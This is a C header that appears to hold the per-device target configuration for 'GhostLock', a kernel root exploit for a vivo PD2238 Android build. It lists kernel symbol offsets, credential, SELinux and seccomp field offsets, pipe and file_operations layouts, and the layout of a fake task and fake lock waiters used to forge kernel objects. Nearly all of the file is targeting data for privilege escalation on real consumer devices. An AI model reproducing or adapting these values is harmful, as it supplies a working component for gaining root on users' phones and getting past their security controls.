/* PD2238 GhostLock target.h — Round-1 verified 2026-09-09
 * Source of truth for this round: kallsyms.txt + output.elf (see report.md)
 * Canonical copy also: src/aristotle-root/src/targets/pd2238-16.3.15.0.W10/target.h
 */
#ifndef TARGET_H
#define TARGET_H

#define BUILD_VARIANT_LABEL "pd2238_os6_163150_w10"
#define BUILD_FINGERPRINT "vivo/PD2238/V2238A:16/SP1A.210812.003/user/release-keys"

#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define P0_PAGE_OFFSET 0xffffff8000000000ULL
#define P0_PHYS_OFFSET 0x40000000ULL
#define P0_KERNEL_PHYS_LOAD 0x40000000ULL
#define KERNELSNITCH_IDENTITY_START 0xffffff8000000000ULL
#define KERNELSNITCH_IDENTITY_END 0xffffffc000000000ULL
#define DIRECT_MAP_BASE 0xffffff8000000000ULL
#define DIRECT_MAP_END 0xffffffc000000000ULL
#define VMEMMAP_START 0xfffffffe00000000ULL

#define PSELECT_WAITER_WORD_SHIFT -2 /* NOT derived from kallsyms; stack-frame TBD */

#define ASHMEM_MISC_FOPS_OFF 0x02c851e8ULL
#define ASHMEM_FOPS_OFF 0x02595010ULL
#define ASHMEM_IOCTL_OFF 0x01254c78ULL
#define ASHMEM_COMPAT_IOCTL_OFF 0x01255328ULL
#define ASHMEM_READ_ITER_OFF 0x01254ba4ULL
#define ASHMEM_MMAP_OFF 0x01255388ULL
#define ASHMEM_OPEN_OFF 0x012555ccULL
#define ASHMEM_RELEASE_OFF 0x01255688ULL
#define ASHMEM_SHOW_FDINFO_OFF 0x012557e8ULL
#define CONFIGFS_READ_BIN_OFF 0x01a3b078ULL
#define CONFIGFS_WRITE_BIN_OFF 0x01a3b668ULL
#define CONFIGFS_READ_ITER_OFF CONFIGFS_READ_BIN_OFF
#define CONFIGFS_BIN_WRITE_ITER_OFF CONFIGFS_WRITE_BIN_OFF
#define COPY_SPLICE_READ_OFF 0x00656e9cULL
#define NOOP_LLSEEK_OFF 0x005d921cULL
#define INIT_TASK_OFF 0x02aec240ULL
#define INIT_UTS_NS_OFF 0x02aebfe8ULL
#define EMPTY_ZERO_PAGE_OFF 0x02d2d000ULL
#define ROOT_TASK_GROUP_OFF 0x02d33100ULL
#define SELINUX_BLOB_SIZES_OFF 0x025d86d0ULL
#define SELINUX_ENFORCING_BOOT_OFF 0x02a94d6cULL
#define SELINUX_STATE_OFF 0x02ec9c40ULL
#define SELINUX_ENFORCING_OFF SELINUX_STATE_OFF
#define SECURITY_HOOK_HEADS_OFF 0x025d8038ULL
#define KMALLOC_CACHES_OFF 0x025d7b70ULL
#define ANON_PIPE_BUF_OPS_OFF 0x02440ba8ULL
#define INIT_NET_OFF 0x02c8f0c0ULL
#define INIT_NSPROXY_OFF 0x02b00fd0ULL
#define SLIDE_NFULNL_LOGGER_OFF 0x02ae16f0ULL
#define SLIDE_LOGGERS_BASE_OFF 0x02ae1618ULL
#define SLIDE_LOGGERS_0_1_OFF 0x02ae1620ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_OFF 0x02ee910dULL
#define SLIDE_INIT_TASK_OFF INIT_TASK_OFF
#define SLIDE_ROOT_TASK_GROUP_OFF ROOT_TASK_GROUP_OFF
#define SLIDE_SYSCTL_BOOTID_OFF 0x02ee910dULL
#define SYSCTL_BOOTID_OFF 0x02ee910dULL

#define SLIDE_NFULNL_LOGGER_IMAGE (KIMAGE_TEXT_BASE + SLIDE_NFULNL_LOGGER_OFF)
#define SLIDE_LOGGERS_0_1_IMAGE (KIMAGE_TEXT_BASE + SLIDE_LOGGERS_0_1_OFF)
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE (KIMAGE_TEXT_BASE + SLIDE_RANDOM_BOOT_ID_DATA_OFF)
#define SLIDE_INIT_TASK_IMAGE (KIMAGE_TEXT_BASE + SLIDE_INIT_TASK_OFF)
#define SLIDE_ROOT_TASK_GROUP_IMAGE (KIMAGE_TEXT_BASE + SLIDE_ROOT_TASK_GROUP_OFF)
#define SLIDE_SYSCTL_BOOTID_IMAGE (KIMAGE_TEXT_BASE + SLIDE_SYSCTL_BOOTID_OFF)
#define SYSCTL_BOOTID (KIMAGE_TEXT_BASE + SYSCTL_BOOTID_OFF)
#define ASHMEM_MISC_FOPS (KIMAGE_TEXT_BASE + ASHMEM_MISC_FOPS_OFF)
#define ASHMEM_FOPS (KIMAGE_TEXT_BASE + ASHMEM_FOPS_OFF)
#define ASHMEM_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_IOCTL_OFF)
#define ASHMEM_COMPAT_IOCTL (KIMAGE_TEXT_BASE + ASHMEM_COMPAT_IOCTL_OFF)
#define ASHMEM_MMAP (KIMAGE_TEXT_BASE + ASHMEM_MMAP_OFF)
#define ASHMEM_OPEN (KIMAGE_TEXT_BASE + ASHMEM_OPEN_OFF)
#define ASHMEM_RELEASE (KIMAGE_TEXT_BASE + ASHMEM_RELEASE_OFF)
#define ASHMEM_SHOW_FDINFO (KIMAGE_TEXT_BASE + ASHMEM_SHOW_FDINFO_OFF)
#define CONFIGFS_READ_ITER (KIMAGE_TEXT_BASE + CONFIGFS_READ_ITER_OFF)
#define CONFIGFS_BIN_WRITE_ITER (KIMAGE_TEXT_BASE + CONFIGFS_BIN_WRITE_ITER_OFF)
#define CONFIGFS_READ_BIN (KIMAGE_TEXT_BASE + CONFIGFS_READ_BIN_OFF)
#define CONFIGFS_WRITE_BIN (KIMAGE_TEXT_BASE + CONFIGFS_WRITE_BIN_OFF)
#define COPY_SPLICE_READ (KIMAGE_TEXT_BASE + COPY_SPLICE_READ_OFF)
#define NOOP_LLSEEK (KIMAGE_TEXT_BASE + NOOP_LLSEEK_OFF)
#define INIT_TASK (KIMAGE_TEXT_BASE + INIT_TASK_OFF)
#define INIT_UTS_NS (KIMAGE_TEXT_BASE + INIT_UTS_NS_OFF)
#define EMPTY_ZERO_PAGE (KIMAGE_TEXT_BASE + EMPTY_ZERO_PAGE_OFF)
#define ROOT_TASK_GROUP (KIMAGE_TEXT_BASE + ROOT_TASK_GROUP_OFF)
#define SELINUX_BLOB_SIZES (KIMAGE_TEXT_BASE + SELINUX_BLOB_SIZES_OFF)
#define SELINUX_ENFORCING (KIMAGE_TEXT_BASE + SELINUX_ENFORCING_OFF)
#define SECURITY_HOOK_HEADS (KIMAGE_TEXT_BASE + SECURITY_HOOK_HEADS_OFF)
#define KMALLOC_CACHES (KIMAGE_TEXT_BASE + KMALLOC_CACHES_OFF)
#define ANON_PIPE_BUF_OPS (KIMAGE_TEXT_BASE + ANON_PIPE_BUF_OPS_OFF)

#define LOCK_OFF 0x1350
#define W0_OFF 0x2220
#define FOPS_OFF 0x1000
#define SCRATCH_OFF 0x3000
#define RIGHT_OFF 0x4440
#define LEFT_OFF 0x5550
#define FAKE_TASK_OFF 0x3200
#define WAITER_LOCAL_OFF 0x50
#define WAITER_TREE_ENTRY_OFF 0x00
#define WAITER_PI_TREE_ENTRY_OFF 0x18
#define WAITER_TASK_OFF 0x30
#define WAITER_LOCK_OFF 0x38
#define WAITER_WAKE_STATE_OFF -1
#define WAITER_PRIO_OFF 0x40
#define WAITER_DEADLINE_OFF 0x48
#define WAITER_WW_CTX_OFF -1
#define FAKE_WAITER_TREE_PRIO_OFF 0x18
#define FAKE_WAITER_TREE_DEADLINE_OFF 0x20
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x28
#define FAKE_WAITER_PI_TREE_PRIO_OFF 0x40
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0x48
#define FAKE_WAITER_TASK_OFF 0x50
#define FAKE_WAITER_LOCK_OFF 0x58
#define FAKE_WAITER_WAKE_STATE_OFF -1
#define FAKE_WAITER_WW_CTX_OFF -1
#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
#define FAKE_TASK_TASK_GROUP_OFF 0x310
#define FAKE_TASK_PI_LOCK_OFF 0x86c
#define FAKE_TASK_PI_WAITERS_OFF 0x880
#define FAKE_TASK_PI_TOP_TASK_OFF 0x890
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x898
#define CFG_PAGE_OFF 16
#define CFG_NEEDS_READ_FILL_OFF 80
#define CFG_BIN_BUFFER_OFF 88
#define CFG_BIN_BUFFER_SIZE_OFF 96
#define CFG_CB_MAX_SIZE_OFF 100
#define MM_OWNER_OFF 1032
#define TASK_PID_OFF 0x5c8
#define TASK_TGID_OFF 0x5cc
#define TASK_REAL_PARENT_OFF 0x5d8
#define TASK_ATOMIC_FLAGS_OFF 0x5d8
#define TASK_REAL_CRED_OFF 0x778
#define TASK_CRED_OFF 0x780
#define TASK_COMM_OFF 0x790
#define TASK_TASKS_OFF 0x4c8
#define TASK_THREAD_INFO_FLAGS_OFF 0x00
#define TASK_SECCOMP_OFF 0x8e8
#define TASK_PI_BLOCKED_ON_OFF 0x898
#define CRED_UID_OFF 4
#define CRED_SECUREBITS_OFF 36
#define CRED_CAPS_OFF 40
#define CRED_SECURITY_OFF 128
#define SELINUX_CRED_BLOB_OFF 0
#define SELINUX_CRED_OSID_OFF 0
#define SELINUX_CRED_SID_OFF 4
#define SECCOMP_MODE_OFF 0x00
#define SECCOMP_FILTER_COUNT_OFF 0x04
#define SECCOMP_FILTER_OFF 0x08
#define TIF_SECCOMP_BIT 11
#define PFA_NO_NEW_PRIVS_BIT 0
#define STRUCT_PAGE_SIZE 0x40
#define STRUCT_PAGE_COMPOUND_HEAD_OFF 0x08
#define STRUCT_SLAB_CACHE_OFF 0x08
#define STRUCT_PAGE_TYPE_OFF 0x30
#define PIPE_BUFFER_SIZE 0x28
#define PIPE_BUFFER_SLOTS 32
#define PIPE_BUF_FLAG_CAN_MERGE 0x10
#define PIPE_INODE_INFO_STRUCT_SIZE 0xb8
#define PIPE_INODE_INFO_SIZE 0xc0
#define PIPE_INODE_INFO_SLOTS_PER_PAGE 21
#define PIPE_HEAD_OFF 0x60
#define PIPE_TAIL_OFF 0x64
#define PIPE_MAX_USAGE_OFF 0x68
#define PIPE_RING_SIZE_OFF 0x6c
#define PIPE_NR_ACCOUNTED_OFF 0x70
#define PIPE_READERS_OFF 0x74
#define PIPE_WRITERS_OFF 0x78
#define PIPE_FILES_OFF 0x7c
#define PIPE_TMP_PAGE_OFF 0x90
#define PIPE_BUFS_OFF 0xa8
#define PIPE_USER_OFF 0xb0
#define FOPS_OWNER_OFF 0x00
#define FOPS_LLSEEK_OFF 0x08
#define FOPS_READ_OFF 0x10
#define FOPS_WRITE_OFF 0x18
#define FOPS_READ_ITER_OFF 0x20
#define FOPS_WRITE_ITER_OFF 0x28
#define FOPS_IOCTL_OFF 0x50
#define FOPS_COMPAT_IOCTL_OFF 0x58
#define FOPS_MMAP_OFF 0x60
#define FOPS_OPEN_OFF 0x70
#define FOPS_RELEASE_OFF 0x80
#define FOPS_SPLICE_WRITE_OFF 0xc0
#define FOPS_SPLICE_READ_OFF 0xc8
#define FOPS_SHOW_FDINFO_OFF 0xe0
#endif
